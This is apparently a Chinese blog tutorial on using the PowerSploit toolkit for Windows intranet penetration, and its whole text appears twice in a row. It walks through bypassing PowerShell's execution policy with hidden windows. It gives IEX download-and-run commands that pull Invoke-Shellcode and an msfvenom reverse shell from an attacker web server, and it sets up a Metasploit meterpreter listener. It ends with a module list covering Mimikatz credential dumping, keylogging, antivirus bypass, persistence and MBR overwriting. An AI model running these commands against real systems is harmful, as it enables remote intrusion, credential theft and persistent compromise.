powershell渗透工具——Powershell内网渗透利器之PowerSploit，场景真tm多啊

Powershell内网渗透利器之PowerSploit

powershell是一种命令行外壳程序和脚本环境，使命令行用户和脚本编写者可以利用 .NET Framework的强大功能，PowerShell脚本的文本文件，其文件名需要加上扩展名“.PS1”。PowerShell需要.NET环境的支持，同时支持.NET对象，其可读性、易用性居所有Shell之首。

PowerShell具有以下特点。

1、在Windows 7以上的操作系统中是默认安装的。

2、PowerShell脚本可以运行在内存中，不需要写入磁盘。

3、几乎不会触发杀毒软件。

4、可以远程执行。

5、目前很多工具都是基于PowerShell开发的。

6、使得Windows的脚本攻击变得更加容易。

7、cmd.exe通常会被阻止运行，但是PowerShell不会。

8、可以用来管理活动目录。

 

 

 

下面以文件操作为例讲解PowerShell命令的基本用法。

1、新建目录：New-ltem whitecellclub-ltemType Directory。

2、新建文件：New-ltem light.txt-ltemType File。

3、删除目录：Remove-ltem whitecellclub。

4、显示文本内容：Get-Content test.txt。

5、设置文本内容：Set-Content test.txt-Va l u e''hello,word! ''。

6、追加内容：Add-Content light.txt-Value ''i love you ''。

7、清除内容：Clear-Content test.txt。

 

请参考powershell在线教程：https://www.pstips.net/powershell-online-tutorials

 

攻击机：kali

靶机：server2008 R2

 

 

首先在kali里把web服务给开开。

 

下载最新版的PowerSploit脚本文件到本地；git clone https://github.com/mattifestation/PowerSploit.git

PowerSploit是GitHub上面的一个安全项目，上面有很多powershell攻击脚本，它们主要被用来渗透中的信息侦察、权限提升、权限维持。

 

再把PowerSploit文件放到web目录中

 

 

用msfvenom生成一个反弹shell，方便invoke-shellcode注入，再把shell放到web里

 

 

（1）绕过本地权限执行

如果是管理员身份可以运行powerrshell之后,设置脚本的运行策略　

set-executionpolicy unrestricted

 

PowerShell脚本在默认情况下无法直接执行，这时可以使用下面方法绕过安全策略，运行PowerShell脚本绕过本地权限 执行。（ 注：先上传PowerUp.ps1至目标服务器）

powershell.exe -exec bypass -Command "& {Import-Module C:\PowerUp.ps1; Invoke-AllChecks}"

 

运行完隐藏命令后窗口会关闭，绕过本地权限隐藏执行

PowerShell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -Nonl

 

（2）从网站服务器上下载PS1脚本，绕过本地权限隐藏执行

在靶机上执行命令（为了更直观所以通过IEX下载调用invoke-shellcode以及生成的反弹马。）

IEX(New-Object Net.WebClient).DownloadString(“http://192.168.1.1/CodeExecution/Invoke-Shellcode.ps1”)

IEX(New-Object Net.WebClient).DownloadString(“http://192.168.1.1/code”)

执行

Invoke-Shellcode -shellcode $buf -Foece

用msf设置监听

use exploit/multi/handler

set PAYLOAD windows/meterpreter/reverse_tcp

set LhOST 192.168.47.131

执行监听，查看效果

若关闭powershell，那么连接也会终断， 因为承载木马的powershell被关闭了。

 

下面对上述命令中的参数进行说明。

1-ExecutionPolicy Bypass（-Exec Bypass）：绕过执行安全策略，这个参数非常重要。在默认情况下，PowerShell的安全策略规定了PowerShell不允许运行命令和文件。通过设置这个参数，可以绕过任意安全保护规则。在渗透测试中，通常每次运行PowerShell脚本时都要使用这个参数。

2-WindowStyle Hidden(-W Hidden)：隐藏窗口。

3-Nonlnteractive（-NonI）：非交互模式。PowerShell不为用户提供交互的提示。-NoProfile（-NoP）：PowerShell控制台不加载当前用户的配置文件。

4-noexit：执行后不退出Shell。这在使用键盘记录等脚本时非常重要。

5-NoLogo：启动不显示版权标志的PowerShell。

 

Windows操作系统中，存在两个版本的PowerShell，一个x64版的，还有一个x86版的。 这两个版本的执行策略不会相互影响，可以把它们看成两个独立的程序。x64版PowerShell的配置文件位于%windir%\syswow64\WindowsPowerShell\v1.0\下。

 

 

 

PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts:

CodeExecution

Execute code on a target machine.

Invoke-DllInjection

Injects a Dll into the process ID of your choosing.

Invoke-ReflectivePEInjection

Reflectively loads a Windows PE file (DLL/EXE) in to the powershell process, or reflectively injects a DLL in to a remote process.

Invoke-Shellcode

Injects shellcode into the process ID of your choosing or within PowerShell locally.

Invoke-WmiCommand

Executes a PowerShell ScriptBlock on a target computer and returns its formatted output using WMI as a C2 channel.

ScriptModification

Modify and/or prepare scripts for execution on a compromised machine.

Out-EncodedCommand

Compresses, Base-64 encodes, and generates command-line output for a PowerShell payload script.

Out-CompressedDll

Compresses, Base-64 encodes, and outputs generated code to load a managed dll in memory.

Out-EncryptedScript

Encrypts text files/scripts.

Remove-Comment

Strips comments and extra whitespace from a script.

Persistence

Add persistence capabilities to a PowerShell script

New-UserPersistenceOption

Configure user-level persistence options for the Add-Persistence function.

New-ElevatedPersistenceOption

Configure elevated persistence options for the Add-Persistence function.

Add-Persistence

Add persistence capabilities to a script.

Install-SSP

Installs a security support provider (SSP) dll.

Get-SecurityPackages

Enumerates all loaded security packages (SSPs).

AntivirusBypass

AV doesn't stand a chance against PowerShell!

Find-AVSignature

Locates single Byte AV signatures utilizing the same method as DSplit from "class101".

Exfiltration

All your data belong to me!

Invoke-TokenManipulation

Lists available logon tokens. Creates processes with other users logon tokens, and impersonates logon tokens in the current thread.

Invoke-CredentialInjection

Create logons with clear-text credentials without triggering a suspicious Event ID 4648 (Explicit Credential Logon).

Invoke-NinjaCopy

Copies a file from an NTFS partitioned volume by reading the raw volume and parsing the NTFS structures.

Invoke-Mimikatz

Reflectively loads Mimikatz 2.0 in memory using PowerShell. Can be used to dump credentials without writing anything to disk. Can be used for any functionality provided with Mimikatz.

Get-Keystrokes

Logs keys pressed, time and the active window.

Get-GPPPassword

Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.

Get-GPPAutologon

Retrieves autologon username and password from registry.xml if pushed through Group Policy Preferences.

Get-TimedScreenshot

A function that takes screenshots at a regular interval and saves them to a folder.

New-VolumeShadowCopy

Creates a new volume shadow copy.

Get-VolumeShadowCopy

Lists the device paths of all local volume shadow copies.

Mount-VolumeShadowCopy

Mounts a volume shadow copy.

Remove-VolumeShadowCopy

Deletes a volume shadow copy.

Get-VaultCredential

Displays Windows vault credential objects including cleartext web credentials.

Out-Minidump

Generates a full-memory minidump of a process.

Get-MicrophoneAudio

Records audio from system microphone and saves to disk

Mayhem

Cause general mayhem with PowerShell.

Set-MasterBootRecord

Proof of concept code that overwrites the master boot record with the message of your choice.

Set-CriticalProcess

Causes your machine to blue screen upon exiting PowerShell.

Privesc

Tools to help with escalating privileges on a target.

PowerUp

Clearing house of common privilege escalation checks, along with some weaponization vectors.

Recon

Tools to aid in the reconnaissance phase of a penetration test.

Invoke-Portscan

Does a simple port scan using regular sockets, based (pretty) loosely on nmap.

Get-HttpStatus

Returns the HTTP Status Codes and full URL for specified paths when provided with a dictionary file.

Invoke-ReverseDnsLookup

Scans an IP address range for DNS PTR records.

PowerView

PowerView is series of functions that performs network and Windows domain enumeration and exploitation.

Recon\Dictionaries

A collection of dictionaries used to aid in the reconnaissance phase of a penetration test. Dictionaries were taken from the following sources.

• admin.txt - http://cirt.net/nikto2/
• generic.txt - http://sourceforge.net/projects/yokoso/files/yokoso-0.1/
• sharepoint.txt - http://www.stachliu.com/resources/tools/sharepoint-hacking-diggity-project/

powershell是一种命令行外壳程序和脚本环境，使命令行用户和脚本编写者可以利用 .NET Framework的强大功能，PowerShell脚本的文本文件，其文件名需要加上扩展名“.PS1”。PowerShell需要.NET环境的支持，同时支持.NET对象，其可读性、易用性居所有Shell之首。

PowerShell具有以下特点。

1、在Windows 7以上的操作系统中是默认安装的。

2、PowerShell脚本可以运行在内存中，不需要写入磁盘。

3、几乎不会触发杀毒软件。

4、可以远程执行。

5、目前很多工具都是基于PowerShell开发的。

6、使得Windows的脚本攻击变得更加容易。

7、cmd.exe通常会被阻止运行，但是PowerShell不会。

8、可以用来管理活动目录。

 

 

 

下面以文件操作为例讲解PowerShell命令的基本用法。

1、新建目录：New-ltem whitecellclub-ltemType Directory。

2、新建文件：New-ltem light.txt-ltemType File。

3、删除目录：Remove-ltem whitecellclub。

4、显示文本内容：Get-Content test.txt。

5、设置文本内容：Set-Content test.txt-Va l u e''hello,word! ''。

6、追加内容：Add-Content light.txt-Value ''i love you ''。

7、清除内容：Clear-Content test.txt。

 

请参考powershell在线教程：https://www.pstips.net/powershell-online-tutorials

 

攻击机：kali

靶机：server2008 R2

 

 

首先在kali里把web服务给开开。

 

下载最新版的PowerSploit脚本文件到本地；git clone https://github.com/mattifestation/PowerSploit.git

PowerSploit是GitHub上面的一个安全项目，上面有很多powershell攻击脚本，它们主要被用来渗透中的信息侦察、权限提升、权限维持。

 

再把PowerSploit文件放到web目录中

 

 

用msfvenom生成一个反弹shell，方便invoke-shellcode注入，再把shell放到web里

 

 

（1）绕过本地权限执行

如果是管理员身份可以运行powerrshell之后,设置脚本的运行策略　

set-executionpolicy unrestricted

 

PowerShell脚本在默认情况下无法直接执行，这时可以使用下面方法绕过安全策略，运行PowerShell脚本绕过本地权限 执行。（ 注：先上传PowerUp.ps1至目标服务器）

powershell.exe -exec bypass -Command "& {Import-Module C:\PowerUp.ps1; Invoke-AllChecks}"

 

运行完隐藏命令后窗口会关闭，绕过本地权限隐藏执行

PowerShell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -Nonl

 

（2）从网站服务器上下载PS1脚本，绕过本地权限隐藏执行

在靶机上执行命令（为了更直观所以通过IEX下载调用invoke-shellcode以及生成的反弹马。）

IEX(New-Object Net.WebClient).DownloadString(“http://192.168.1.1/CodeExecution/Invoke-Shellcode.ps1”)

IEX(New-Object Net.WebClient).DownloadString(“http://192.168.1.1/code”)

执行

Invoke-Shellcode -shellcode $buf -Foece

用msf设置监听

use exploit/multi/handler

set PAYLOAD windows/meterpreter/reverse_tcp

set LhOST 192.168.47.131

执行监听，查看效果

若关闭powershell，那么连接也会终断， 因为承载木马的powershell被关闭了。

 

下面对上述命令中的参数进行说明。

1-ExecutionPolicy Bypass（-Exec Bypass）：绕过执行安全策略，这个参数非常重要。在默认情况下，PowerShell的安全策略规定了PowerShell不允许运行命令和文件。通过设置这个参数，可以绕过任意安全保护规则。在渗透测试中，通常每次运行PowerShell脚本时都要使用这个参数。

2-WindowStyle Hidden(-W Hidden)：隐藏窗口。

3-Nonlnteractive（-NonI）：非交互模式。PowerShell不为用户提供交互的提示。-NoProfile（-NoP）：PowerShell控制台不加载当前用户的配置文件。

4-noexit：执行后不退出Shell。这在使用键盘记录等脚本时非常重要。

5-NoLogo：启动不显示版权标志的PowerShell。

 

Windows操作系统中，存在两个版本的PowerShell，一个x64版的，还有一个x86版的。 这两个版本的执行策略不会相互影响，可以把它们看成两个独立的程序。x64版PowerShell的配置文件位于%windir%\syswow64\WindowsPowerShell\v1.0\下。

 

 

 

PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts:

CodeExecution

Execute code on a target machine.

Invoke-DllInjection

Injects a Dll into the process ID of your choosing.

Invoke-ReflectivePEInjection

Reflectively loads a Windows PE file (DLL/EXE) in to the powershell process, or reflectively injects a DLL in to a remote process.

Invoke-Shellcode

Injects shellcode into the process ID of your choosing or within PowerShell locally.

Invoke-WmiCommand

Executes a PowerShell ScriptBlock on a target computer and returns its formatted output using WMI as a C2 channel.

ScriptModification

Modify and/or prepare scripts for execution on a compromised machine.

Out-EncodedCommand

Compresses, Base-64 encodes, and generates command-line output for a PowerShell payload script.

Out-CompressedDll

Compresses, Base-64 encodes, and outputs generated code to load a managed dll in memory.

Out-EncryptedScript

Encrypts text files/scripts.

Remove-Comment

Strips comments and extra whitespace from a script.

Persistence

Add persistence capabilities to a PowerShell script

New-UserPersistenceOption

Configure user-level persistence options for the Add-Persistence function.

New-ElevatedPersistenceOption

Configure elevated persistence options for the Add-Persistence function.

Add-Persistence

Add persistence capabilities to a script.

Install-SSP

Installs a security support provider (SSP) dll.

Get-SecurityPackages

Enumerates all loaded security packages (SSPs).

AntivirusBypass

AV doesn't stand a chance against PowerShell!

Find-AVSignature

Locates single Byte AV signatures utilizing the same method as DSplit from "class101".

Exfiltration

All your data belong to me!

Invoke-TokenManipulation

Lists available logon tokens. Creates processes with other users logon tokens, and impersonates logon tokens in the current thread.

Invoke-CredentialInjection

Create logons with clear-text credentials without triggering a suspicious Event ID 4648 (Explicit Credential Logon).

Invoke-NinjaCopy

Copies a file from an NTFS partitioned volume by reading the raw volume and parsing the NTFS structures.

Invoke-Mimikatz

Reflectively loads Mimikatz 2.0 in memory using PowerShell. Can be used to dump credentials without writing anything to disk. Can be used for any functionality provided with Mimikatz.

Get-Keystrokes

Logs keys pressed, time and the active window.

Get-GPPPassword

Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.

Get-GPPAutologon

Retrieves autologon username and password from registry.xml if pushed through Group Policy Preferences.

Get-TimedScreenshot

A function that takes screenshots at a regular interval and saves them to a folder.

New-VolumeShadowCopy

Creates a new volume shadow copy.

Get-VolumeShadowCopy

Lists the device paths of all local volume shadow copies.

Mount-VolumeShadowCopy

Mounts a volume shadow copy.

Remove-VolumeShadowCopy

Deletes a volume shadow copy.

Get-VaultCredential

Displays Windows vault credential objects including cleartext web credentials.

Out-Minidump

Generates a full-memory minidump of a process.

Get-MicrophoneAudio

Records audio from system microphone and saves to disk

Mayhem

Cause general mayhem with PowerShell.

Set-MasterBootRecord

Proof of concept code that overwrites the master boot record with the message of your choice.

Set-CriticalProcess

Causes your machine to blue screen upon exiting PowerShell.

Privesc

Tools to help with escalating privileges on a target.

PowerUp

Clearing house of common privilege escalation checks, along with some weaponization vectors.

Recon

Tools to aid in the reconnaissance phase of a penetration test.

Invoke-Portscan

Does a simple port scan using regular sockets, based (pretty) loosely on nmap.

Get-HttpStatus

Returns the HTTP Status Codes and full URL for specified paths when provided with a dictionary file.

Invoke-ReverseDnsLookup

Scans an IP address range for DNS PTR records.

PowerView

PowerView is series of functions that performs network and Windows domain enumeration and exploitation.

Recon\Dictionaries

A collection of dictionaries used to aid in the reconnaissance phase of a penetration test. Dictionaries were taken from the following sources.

• admin.txt - http://cirt.net/nikto2/
• generic.txt - http://sourceforge.net/projects/yokoso/files/yokoso-0.1/
• sharepoint.txt - http://www.stachliu.com/resources/tools/sharepoint-hacking-diggity-project/